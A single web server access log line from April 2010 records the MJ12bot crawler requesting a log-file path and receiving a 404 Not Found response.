205.209.170.26 - - [26/Apr/2010:10:29:31 -0500] "GET /logs/access_log.1223251200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.2; http://www.majestic12.co.uk/bot.php?+)"
